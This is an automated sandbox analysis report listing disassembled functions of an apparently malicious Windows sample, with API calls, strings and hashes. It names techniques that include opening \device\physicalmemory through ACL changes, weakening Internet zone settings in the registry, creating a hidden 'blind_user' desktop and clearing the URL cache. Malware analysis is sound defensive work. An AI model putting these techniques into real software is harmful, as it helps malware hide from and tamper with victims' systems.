                            • Associated: 00000004.00000002.1983031337.0000000000438000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_400000_Oglabl32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Thread$AllocCloseCodeCreateExitHandleLocalObjectSingleWaitmemcpy
                            • String ID:
                            • API String ID: 2845097592-0
                            • Opcode ID: 7ec933356805a86d395f76af41b9b2d9f18e99f1d3eeeb5c371ae48cad7448a7
                            • Instruction ID: 017c82820a2f145177c9e28e2e3f5c0bebc6ad2cdfe5315ab2aa4ad5daf85086
                            • Opcode Fuzzy Hash: 7ec933356805a86d395f76af41b9b2d9f18e99f1d3eeeb5c371ae48cad7448a7
                            • Instruction Fuzzy Hash: 5E31D721A04159BACF01DFA6CC01AAEB7F9AF44318F144476F904E7291E63CDB15C7A9
                            Function 00405F5B Relevance: 13.6, APIs: 9, Instructions: 64stringthreadmemoryCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00405F73
                            • lstrlenA.KERNEL32(?,?), ref: 00405F7E
                            • LocalAlloc.KERNEL32(00000040,?,?,?), ref: 00405F8D
                            • lstrlenA.KERNEL32(?,00000000,?,00000040,?,?,?), ref: 00405FA2
                            • DeleteUrlCacheEntry.WININET(?), ref: 00405FB5
                            • CreateThread.KERNEL32(00000000,00000000,Function_00005C09,00000000,00000000,?), ref: 00405FCA
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040,?,?), ref: 00405FDD
                            • GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040), ref: 00405FE7
                            • CloseHandle.KERNEL32(00000000,00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?), ref: 00405FED
                            Memory Dump Source
                            • Source File: 00000004.00000002.1982942456.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000004.00000002.1982926003.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982981112.000000000042E000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982997408.000000000042F000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983015064.0000000000436000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983031337.0000000000438000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_400000_Oglabl32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Thread$AllocCacheCloseCodeCreateDeleteEntryExitHandleLocalObjectSingleWait
                            • String ID:
                            • API String ID: 794401840-0
                            • Opcode ID: 03fc3e79f5e594bfaf1f893bda151e66fa8c5b5e213fcd764589a016d7372ae4
                            • Instruction ID: 5ee1198a60b0fc2a8532ff5616a25e8349e08cf473eab22e95dc85017e90c3ca
                            • Opcode Fuzzy Hash: 03fc3e79f5e594bfaf1f893bda151e66fa8c5b5e213fcd764589a016d7372ae4
                            • Instruction Fuzzy Hash: B011CA71A082447BD701F6668C42EAFB76DDF85368F144476F600B71C2D678AF0147E9
                            Function 0040289A Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 99COMMON
                            Download Yara Rule
                            APIs
                            • GetSecurityInfo.ADVAPI32(?,00000006,?,00000000,00000000,?,00000000,?), ref: 00402976
                            • SetEntriesInAclA.ADVAPI32(00000001,00000002,?,?), ref: 00402988
                            • SetSecurityInfo.ADVAPI32(?,00000006,?,00000000,00000000,?,00000000,?,00000006,?,00000000,00000000,?,00000000,?), ref: 004029A3
                            • CloseHandle.KERNEL32(?,?,00000006,?,00000000,00000000,?,00000000,?,00000006,?,00000000,00000000,?,00000000,?), ref: 004029B1
                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.1982942456.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000004.00000002.1982926003.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982981112.000000000042E000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982997408.000000000042F000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983015064.0000000000436000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983031337.0000000000438000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_400000_Oglabl32.jbxd
                            Yara matches
                            Similarity
                            • API ID: InfoSecurity$CloseEntriesHandle
                            • String ID: @$CURRENT_USER$\device\physicalmemory
                            • API String ID: 405656561-3357994103
                            • Opcode ID: 3f106b48de9bb5ba9ca254209248b2c107f34978da584956db3145db2ea5644b
                            • Instruction ID: 89d45d45e0a184fa7970b295066ffccd564a705ae1855cc5323f3f658fcd5c06
                            • Opcode Fuzzy Hash: 3f106b48de9bb5ba9ca254209248b2c107f34978da584956db3145db2ea5644b
                            • Instruction Fuzzy Hash: 2A41EB71E4030DAFEB108FD4DC85BEEB7B9FB04319F50403AEA00BA191D7B9595A8B59
                            Function 0040509B Relevance: 12.0, APIs: 1, Strings: 7, Instructions: 43COMMON
                            Download Yara Rule
                            APIs
                            • sprintf.CRTDLL(?,SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u,00000000), ref: 004050CD
                            Strings
                            • Software\Microsoft\Windows\CurrentVersion\Internet Settings, xrefs: 004050FF
                            • .DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess, xrefs: 00405118
                            • yes, xrefs: 0040510E
                            • SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u, xrefs: 004050C1
                            • 1601, xrefs: 004050D4
                            • BrowseNewProcess, xrefs: 00405113
                            • GlobalUserOffline, xrefs: 004050FA
                            Memory Dump Source
                            • Source File: 00000004.00000002.1982942456.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000004.00000002.1982926003.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982981112.000000000042E000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982997408.000000000042F000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983015064.0000000000436000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983031337.0000000000438000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_400000_Oglabl32.jbxd
                            Yara matches
                            Similarity
                            • API ID: sprintf
                            • String ID: .DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess$1601$BrowseNewProcess$GlobalUserOffline$SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u$Software\Microsoft\Windows\CurrentVersion\Internet Settings$yes
                            • API String ID: 590974362-546450379
                            • Opcode ID: ad57bd7a5e5ee7174c091d0a3ea72984deb32bb5560bbbda773b8a609c7be674
                            • Instruction ID: cd0aaffbc0bd71aa605591c0976343fec0ffbebd6d6d4fedce8ce2f9217411d7
                            • Opcode Fuzzy Hash: ad57bd7a5e5ee7174c091d0a3ea72984deb32bb5560bbbda773b8a609c7be674
                            • Instruction Fuzzy Hash: 24F07DF2F883587EE710A1699C47F8D765907A1704FA400A7BA44B10C2D0FE56C6826D
                            Function 004077E4 Relevance: 10.6, APIs: 7, Instructions: 83windowCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000004.00000002.1982942456.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000004.00000002.1982926003.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982981112.000000000042E000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982997408.000000000042F000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983015064.0000000000436000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983031337.0000000000438000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_400000_Oglabl32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Focus$CallProcWindow
                            • String ID:
                            • API String ID: 2401821148-0
                            • Opcode ID: 92e1ce8f7ee7a46a278bda77c005b4e0a5389e500612bd3ca87d360d572643d3
                            • Instruction ID: 67d25c2989ca0d32993d4aa71a0b11dc39683739a3ff9c0c7d6bcfde353c753a
                            • Opcode Fuzzy Hash: 92e1ce8f7ee7a46a278bda77c005b4e0a5389e500612bd3ca87d360d572643d3
                            • Instruction Fuzzy Hash: 6F318233E082149BDF21FB29ED848DA7726A751324715C43AE550B32B1DB787C91CB6E
                            Function 004036B3 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 57fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 004036D7
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 004036F4
                            • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403715
                            • WriteFile.KERNEL32(00000000,0042CC6C,00000002,?,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000), ref: 00403728
                            • CloseHandle.KERNEL32(00000000,00000000,0042CC6C,00000002,?,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?), ref: 00403734
                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.1982942456.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000004.00000002.1982926003.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982981112.000000000042E000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982997408.000000000042F000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983015064.0000000000436000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983031337.0000000000438000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_400000_Oglabl32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Write$CloseCreateHandlePointer
                            • String ID: Y&-v
                            • API String ID: 2529654636-852306816
                            • Opcode ID: 1a2ee31b6e64b1819939f0b424d9492dfa5bc2d8a36479f3b8c11624ee1f3d36
                            • Instruction ID: 393fb1fac6dfb6d7043d4134058e676a256c67ba5a84656a07003a75d011006f
                            • Opcode Fuzzy Hash: 1a2ee31b6e64b1819939f0b424d9492dfa5bc2d8a36479f3b8c11624ee1f3d36
                            • Instruction Fuzzy Hash: A401A772B4461439F62165758C43F9E365D8B41B78F208136F711BB1C1D6F97E0142BD
                            Function 00405613 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78COMMON
                            Download Yara Rule
                            APIs
                            • FindFirstUrlCacheEntryA.WININET(*.*,?,00001F40), ref: 00405654
                            • _stricmp.CRTDLL(?,?), ref: 00405679
                            • FindNextUrlCacheEntryA.WININET(00000000,?,00001F40), ref: 004056C0
                            • _stricmp.CRTDLL(?,?), ref: 004056D6
                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.1982942456.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000004.00000002.1982926003.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982981112.000000000042E000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982997408.000000000042F000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983015064.0000000000436000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983031337.0000000000438000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_400000_Oglabl32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CacheEntryFind_stricmp$FirstNext
                            • String ID: *.*
                            • API String ID: 747601842-438819550
                            • Opcode ID: ba5afd5151c0520d6d715a10c5df759dc41a82144f0bc2f8a3a4ef8e8a54dfaf
                            • Instruction ID: aa6d97de36eacb02400b0bc5d5be45fc0d4f636131057f9c0ab70f2a458f06eb
                            • Opcode Fuzzy Hash: ba5afd5151c0520d6d715a10c5df759dc41a82144f0bc2f8a3a4ef8e8a54dfaf
                            • Instruction Fuzzy Hash: AD21CF72E1005AABCB109A65CC018FBB6EEEB44398F1404F3F108F7290EB799E418F65
                            Function 0040431F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50threadCOMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentThreadId.KERNEL32 ref: 00404341
                            • GetThreadDesktop.USER32(00000000), ref: 00404347
                            • CreateDesktopA.USER32(blind_user,00000000,00000000,00000000,000000C7,00000000), ref: 00404376
                            • SetThreadDesktop.USER32 ref: 00404394
                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.1982942456.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000004.00000002.1982926003.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982981112.000000000042E000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982997408.000000000042F000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983015064.0000000000436000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983031337.0000000000438000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_400000_Oglabl32.jbxd
                            Yara matches
                            Similarity
                            • API ID: DesktopThread$CreateCurrent
                            • String ID: blind_user
                            • API String ID: 2384851093-487808672
                            • Opcode ID: f5dbc74db38e7769b0145d7bd92762358955ae931e1e69e9e23be6df9a4e239d
                            • Instruction ID: 282a6fb7077f79b337956a50597d570250b08ff90f4541f666399335e01d3b83
                            • Opcode Fuzzy Hash: f5dbc74db38e7769b0145d7bd92762358955ae931e1e69e9e23be6df9a4e239d
                            • Instruction Fuzzy Hash: 2C018471B442006FDB14B73E9C5276FA6D95BC0314F64403BA602F72D0E9B899018A5D
                            Function 00403840 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.1982942456.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000004.00000002.1982926003.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982981112.000000000042E000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982997408.000000000042F000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983015064.0000000000436000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983031337.0000000000438000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_400000_Oglabl32.jbxd
                            Yara matches
                            Similarity
                            • API ID: printf
                            • String ID: %02X $HEX:
                            • API String ID: 3524737521-2568639716
                            • Opcode ID: 20ec43f9d3281b237926bfbb5e092365326a766f922892e0b88cafedccc6c182
                            • Instruction ID: 8eff4c8c66366255d0771bcdb7d8d21a427f9234d78b176c67630138abebef86
                            • Opcode Fuzzy Hash: 20ec43f9d3281b237926bfbb5e092365326a766f922892e0b88cafedccc6c182
                            • Instruction Fuzzy Hash: 43F0E972F05214BBD704DB9ADC4286E77A9DB9236473080FBF804631C0E9755F0086A9
                            Function 00403BBE Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 112COMMON
                            Download Yara Rule
                            APIs
                            • memset.CRTDLL(?,00000090,00000008,56CC39D8,-0042AA50,297D09F2,00000000), ref: 00403C8B
                            • memcpy.CRTDLL(?,-0042AA50,00000000,?,00000090,00000008,56CC39D8,-0042AA50,297D09F2,00000000), ref: 00403CAE
                            • memcpy.CRTDLL(-0042AA50,?,00000006,?,-0042AA50,00000000,?,00000090,00000008,56CC39D8,-0042AA50,297D09F2,00000000), ref: 00403CBE
                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.1982942456.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000004.00000002.1982926003.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982981112.000000000042E000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982997408.000000000042F000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983015064.0000000000436000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983031337.0000000000438000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_400000_Oglabl32.jbxd
                            Yara matches
                            Similarity
                            • API ID: memcpy$memset
                            • String ID: MC
                            • API String ID: 438689982-3957011357
                            • Opcode ID: 17c6be56fc60e202b714f164ab6214ad707b693cbc1fda5e6d8626b4e57840bc
                            • Instruction ID: 0fabd55d67194886af3b95eda558b9f651b3b184c5d0290ca09bafd6d30b71fa
                            • Opcode Fuzzy Hash: 17c6be56fc60e202b714f164ab6214ad707b693cbc1fda5e6d8626b4e57840bc
                            • Instruction Fuzzy Hash: F131B661F08198AFDB00DFBDC84169EBFFA9B4A210F1480B6E884F7381D5789F059765
                            Function 004017AC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68comCOMMON
                            Download Yara Rule
                            APIs
                            • CoInitialize.OLE32(00000000), ref: 004017CC
                            • CLSIDFromString.OLE32({9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 004017DA
                            • CoCreateInstance.OLE32(?,00000000,?,0042CD50,?,{9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 00401803
                            Strings
                            • {9BA05972-F6A8-11CF-A442-00A0C90A8F39}, xrefs: 004017D5
                            Memory Dump Source
                            • Source File: 00000004.00000002.1982942456.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000004.00000002.1982926003.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982981112.000000000042E000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982997408.000000000042F000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983015064.0000000000436000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983031337.0000000000438000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_400000_Oglabl32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateFromInitializeInstanceString
                            • String ID: {9BA05972-F6A8-11CF-A442-00A0C90A8F39}
                            • API String ID: 1245325315-1222218007
                            • Opcode ID: 374fb238f9a8af98a0c272c884aa5e7a000c0b0753857630dac3c0af84d03f4f
                            • Instruction ID: 52c0c8d8f8a1b88d6522b4dea913535513547713cd70a2aa0dd21656c7656eb5
                            • Opcode Fuzzy Hash: 374fb238f9a8af98a0c272c884aa5e7a000c0b0753857630dac3c0af84d03f4f
                            • Instruction Fuzzy Hash: E1118673B102116FE710FEF5DC81BAB7AE89B00355F10483BE644F32D1E6B8A50286B9
                            Function 0040109B Relevance: 6.1, APIs: 4, Instructions: 122COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000004.00000002.1982942456.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000004.00000002.1982926003.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982981112.000000000042E000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982997408.000000000042F000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983015064.0000000000436000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983031337.0000000000438000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_400000_Oglabl32.jbxd
                            Yara matches
                            Similarity
                            • API ID: signal$raise
                            • String ID:
                            • API String ID: 372037113-0
                            • Opcode ID: 2d1ef5de37ea69ebb4b8d4bb24db1da757c13c860f6842aad27d4f5ac914ae12
                            • Instruction ID: baa5ba32779064c34a5af0890878b5a2dbb5619b613b0807c362cc876063d63b
                            • Opcode Fuzzy Hash: 2d1ef5de37ea69ebb4b8d4bb24db1da757c13c860f6842aad27d4f5ac914ae12
                            • Instruction Fuzzy Hash: 4541B475A01204DFC720DF18EC84B5677B4FB08350F44457AEE14AB3E1E734A965CBAA
                            Function 0040447A Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68memorystringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00404492
                            • LocalAlloc.KERNEL32(00000040,-00000008,?), ref: 004044A4
                            • sprintf.CRTDLL(?,%s%c%c,?,4EC4EBEE,?,00000040,-00000008,?), ref: 00404515
                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.1982942456.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000004.00000002.1982926003.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982981112.000000000042E000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982997408.000000000042F000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983015064.0000000000436000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983031337.0000000000438000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_400000_Oglabl32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocLocallstrlensprintf
                            • String ID: %s%c%c
                            • API String ID: 2176257816-3118753097
                            • Opcode ID: 3bea807363c46ff2eeabd7410228c447bcb65eafde6f1461acbb5ea9ba8cf64b
                            • Instruction ID: 40b1eb1d73d9c04af9a72cf5af1a140bd4a75b2e1492408562adfdfa8721cd8f
                            • Opcode Fuzzy Hash: 3bea807363c46ff2eeabd7410228c447bcb65eafde6f1461acbb5ea9ba8cf64b
                            • Instruction Fuzzy Hash: F9110B72E0406867DB009A9A88815AFFBB69FC5310F1641F7EA04B73C1D27CAD0193A5
                            Function 0040421F Relevance: 6.0, APIs: 4, Instructions: 49registryCOMMON
                            Download Yara Rule
                            APIs
                            • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,00020006,00000000,?,?,4FB14922), ref: 00404255
                            • RegSetValueExA.ADVAPI32(?,4FB14922,00000000,00000000,?,?,?,?,00000000,00000000,00000000,00020006,00000000,?,?,4FB14922), ref: 00404273
                            • RegCloseKey.ADVAPI32(?,?,4FB14922,00000000,00000000,?,?,?,?,00000000,00000000,00000000,00020006,00000000,?,?), ref: 0040427F
                            Memory Dump Source
                            • Source File: 00000004.00000002.1982942456.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000004.00000002.1982926003.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982981112.000000000042E000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982997408.000000000042F000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983015064.0000000000436000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983031337.0000000000438000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_400000_Oglabl32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCreateValue
                            • String ID:
                            • API String ID: 1818849710-0
                            • Opcode ID: 65498cc65565106dc5b66ff6a4b4d842dc0e77ec129b82882a45272a282f6444
                            • Instruction ID: d96ef7c4080a9b633a5bca21bfcbc2c766a155132064e5ed691f16c3214ccdec
                            • Opcode Fuzzy Hash: 65498cc65565106dc5b66ff6a4b4d842dc0e77ec129b82882a45272a282f6444
                            • Instruction Fuzzy Hash: B801F772B10109BBCF11AEB5CC02F9EBEBA9F84340F240476B704F61E0D675D9116718
                            Function 0040429C Relevance: 6.0, APIs: 4, Instructions: 47registryCOMMON
                            Download Yara Rule
                            APIs
                            • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004042D3
                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00020019,?), ref: 004042EF
                            • RegCloseKey.ADVAPI32(?,?,?,00000000,00000000,?,?,?,?,00000000,00020019,?), ref: 004042FB
                            Memory Dump Source
                            • Source File: 00000004.00000002.1982942456.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000004.00000002.1982926003.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982981112.000000000042E000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982997408.000000000042F000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983015064.0000000000436000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983031337.0000000000438000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_400000_Oglabl32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseOpenQueryValue
                            • String ID:
                            • API String ID: 3677997916-0
                            • Opcode ID: 357a631b938b58c4fbb87905ba1aa3de6a3adf1b78dd9d8722630d207e2470c7
                            • Instruction ID: 691f158720e2b36127ee9bd81ba90e70b5a5535aabeb9bf87ba7554e5ddc9d88
                            • Opcode Fuzzy Hash: 357a631b938b58c4fbb87905ba1aa3de6a3adf1b78dd9d8722630d207e2470c7
                            • Instruction Fuzzy Hash: 9801F271B1410ABACF109E25CC02BEEBFA99F94390F140472BE04F61E1D374EE11A3A9
                            Function 00403743 Relevance: 6.0, APIs: 4, Instructions: 43fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403769
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403780
                            • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403798
                            • CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080), ref: 0040379E
                            Memory Dump Source
